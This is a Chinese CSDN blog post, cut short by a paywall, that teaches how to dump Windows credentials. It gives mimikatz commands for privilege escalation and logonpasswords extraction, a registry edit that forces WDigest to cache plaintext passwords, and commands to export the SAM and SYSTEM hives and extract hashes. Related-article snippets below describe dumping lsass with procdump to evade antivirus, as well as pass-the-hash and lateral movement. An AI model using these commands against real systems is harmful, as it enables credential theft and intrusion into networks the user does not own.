mimikatz配合procdump抓取密码

最新推荐文章于 2024-05-11 15:00:00 发布
最新推荐文章于 2024-05-11 15:00:00 发布
阅读量3.8k 收藏 13
点赞数 1
分类专栏: 笔记 文章标签: windows
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_44881113/article/details/120315448
版权

0x01 获取本地帐户密码
1.1 本地执行
下载mimikatz程序,找到自己系统对应的位数,右键以管理员身份运行:
(不是管理员会报错)

#提升权限
privilege::debug
#抓取密码
sekurlsa::logonpasswords

当目标为win10或2012R2以上时,默认在内存缓存中禁止保存明文密码,但可以通过修改注册表的方式抓取明文。
cmd修改注册表命令:

reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1 /f
#重启或用户重新登录后可以成功抓取

1.2 SAM表获取hash

#导出SAM数据
reg save HKLM\SYSTEM SYSTEM
reg save HKLM\SAM SAM

#使用mimikatz提取hash
lsadump::sam /sam
最低0.47元/天 解锁文章
金色的天空
关注
  • 1
    点赞
  • 13
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
绕过360实现lsass转储
hongduilanjun的博客
04-18 932
前言 获取Windows用户的凭证信息是渗透过程中至关重要的一步。 没杀软,只要有权限想怎么读就怎么读。 有杀软,得用一些特别的技巧。 注:本机所有测试均为物理机,且为最新版AV Mimikatz直接读取Lsass进程 权限提升 privilege::debug 抓取密码 sekurlsa::logonpasswords [外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-BSPqd5Xv-1650257094211)(image-20220411145456534.png
mimikatz 抓取 Windows 明文密码
06-02
Mimikatz - Windows 密码抓取神器 轻量级调试器神器 - mimikatz - 直接抓取 Windows 明文密码! 这个神器的功能肯定不仅仅如此 在我看来它更像一个轻量级调试器 可以提升进程权限 注入进程 读取
01-windows调试工具(ProcDump使用)
qq_37103755的博客
11-21 6578
windows ProcDump工具使用
利用procdump+Mimikatz绕过杀软获取Windows明文密码
大河之犬的博客
09-12 564
Mimikatz是从lsass.exe中提取明文密码的,当无法在目标机器上运行Mimikatz时,我们可使用ProcDump工具将系统的lsass.exe进程进行转储,导出dmp文件,拖回到本地后,在本地再利用Mimikatz进行读取。而ProcDump本身是作为一个正常的运维辅助工具使用,并不带毒,所以不会被杀软查杀。
Windows密码破解常见手段
最新发布
2301_80127209的博客
05-11 843
值得一提的是,这个项目能过windows defender 进行dump lsass内存,且只把相关的内容给dump下来,非常的香!申明:本账号所分享内容仅用于网络安全技术讨论,切勿用于违法途径,所有渗透都需获取授权,违者后果自行承担,与本号及作者无关,请谨记守法。环境搭建、HTML,PHP,MySQL基础学习,信息收集,SQL注入,XSS,CSRF,暴力破解等等。这也是github上面的项目,很热乎,刚提交不交,被我无意间发现了,这就是个宝藏。
procdumpmimikatz联动
weixin_45715461的博客
06-30 679
procdumpmimikatz联动
使用ProcDump.exe自动抓取高cpu时w3wp的dump
weixin_30478923的博客
07-22 515
我们经常遇到w3wp.exe进程的CPU占用率在某一时间段内突然升高几倍,但是无论使用adplus.vbs还是debug dialog去抓取这一瞬间的dump都是有难度的。而且遇到高cpu的问题我们通常抓取一个dump不能看出问题,需要多个样例。 ProcDump.exe就能够很好的处理这个情况: procdump -ma -c 50 -s 3 -n 2 5844(Process Name or ...
Mimikatz Windows 密码抓取神器
05-27
这款工具因其强大的密码抓取能力而闻名,可以提取出系统内存中的明文密码、哈希值以及其他敏感凭证,从而帮助安全研究人员检测系统的漏洞和防护措施。 在Windows环境中,Mimikatz 能够执行以下关键功能: 1. **LSA...
mimikatz抓取管理员密码常用工具
12-10
1. **合法使用**:mimikatz使用必须遵循法律法规,未经授权的密码抓取是违法的。在企业环境中,应只在获得授权并确保合规的情况下使用。 2. **风险防范**:mimikatz的存在提醒我们,要定期更改密码使用复杂度高...
procdump+mimikatz.zip
11-14
mimikatz是由法国安全研究员Benjamin Delpy开发的开源工具,主要用于获取Windows系统的敏感信息,如明文密码、kerberos票证、LSA(本地安全机构)秘密等。mimikatz因其强大的信息收集能力,常常被安全研究人员用于...
mimikatz(windows 明文密码抓取工具)
04-02
**mimikatzWindows明文密码抓取工具详解** mimikatz是一款由法国安全研究员Benjamin Delpy开发的开源工具,主要用于在Windows操作系统中获取明文密码、 kerberos票据、LSA秘密等敏感信息。由于其功能强大且易于...
Procdump密码读取.zip
04-16
用于本地密码内存读取,使用方法包含着压缩包中
使用Procdump+mimikatz抓取windows7明文密码
qq_40671478的博客
09-02 1472
首先打开mimikatz_trunk2.0 在DOS运行界面中输入privilege::debug提权命令1 我们提权成功后,我们再来输入sekurlsa::logonpasswords抓取密码命令 但是出现错误,如下图 网上搜索了一下,我决定使用procdump结合mimikatz实现免杀效果,procdump是微软的官方工具,不会被杀. 首先在任务管理器找到lsass.exe,右键创建转储文件 ...
mimikatz提取文件中的用户名和密码
只有不断学习才不会被茫茫人海淹没!
05-12 605
切换到文件位置 输入命令提取: lsadump::sam /sam:SAM /system:SYSTEM
内网渗透-Mimikatz+Procdump使用
weixin_60830484的博客
04-24 468
在内网渗透中,获取目标明文密码是必不可少的一部分,可以扩大"攻击面",因此本文将讲解相关工具的使用以及原理。
DAY39:横向渗透
qq_49433473的博客
08-28 1743
哈希传递攻击概述(PTH) 、横向渗透横向移动工具合集使用方法MimikatzProcdump+Mimikatz、psexec 、msf、CrackMapExec批量横向渗透、WMI 命令、Invoke-WmiCommand(PowerShell)
服务器生成dump文件,使用ProcDump自动生成Dump文件
weixin_42420422的博客
08-05 631
最近用来自动产生Dump文件一是用来监视服务器程序无响应procdump -accepteula -64 -ma -hserver.exe二是用来监视客户端程序闪退(猜测是有未处理的异常)procdump -accepteula -ma -eclient.exe注意:客户端程序是32位,服务器程序是64位的下面的例子来自官方介绍:为名为“notepad”的进程产生迷你Dump文件(只能有一个匹...
Procdump+mimikatz绕过安全防护读取密码
xxx9686的博客
09-16 322
在我们提权过程中经常会遇到杀毒软件,在我们将提权exp或者密码读取工具一上传至目标服务器立马被删的尴尬,本文完美解决此问题。Procdump是微软自家的外部工具,其主要目的是监视应用程序中的CPU尖峰并在尖峰期间生成崩溃转储。运行后将会保存lsass到本地,我们可以将该文件拖动到物理机中,使用mimikatz对其密码查看。使用procdump转储lsass进程。
mimikatz查看win10密码
05-13
请注意,使用Mimikatz来获取未经授权的访问密码或尝试获取其他人的密码可能是非法的,这可能会导致法律后果。在此仅提供给安全研究人员或系统管理员进行安全审计和测试的参考。 以下是使用Mimikatz获取Win10密码的...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值